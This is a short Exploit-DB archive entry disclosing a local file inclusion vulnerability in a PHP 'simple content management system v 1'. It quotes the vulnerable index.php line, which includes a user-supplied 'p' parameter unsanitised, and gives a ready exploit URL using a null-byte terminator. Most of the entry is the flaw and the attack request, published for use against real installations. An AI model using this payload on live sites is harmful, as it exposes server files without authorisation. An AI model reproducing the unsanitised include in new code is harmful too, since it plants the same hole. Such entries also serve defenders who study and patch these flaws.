exploit-db-mirror/platforms/php/webapps/7818.txt
Offensive Security 5a468df6b9 Updated 12_08_2013
2013-12-08 16:08:13 +00:00

32 lines
979 B
Text
Executable file

--:local file include:--
---------------------------------
script:simple content management system v 1
-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip
-------------------------------------------------------
...............................................
vul:/index.php line 34:
<?php
if (!isset($_GET['p']))
include("../SCMSv1/includes/default.txt");
} else include("includes/" . $_GET['p'] . ".txt");
?>
-------------------------------------------
-------------------------------------------
xpl:
http://127.0.0.1/path/index.php?p=[Lfi]%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from:[iran]
---------------------------------------------------
# milw0rm.com [2009-01-18]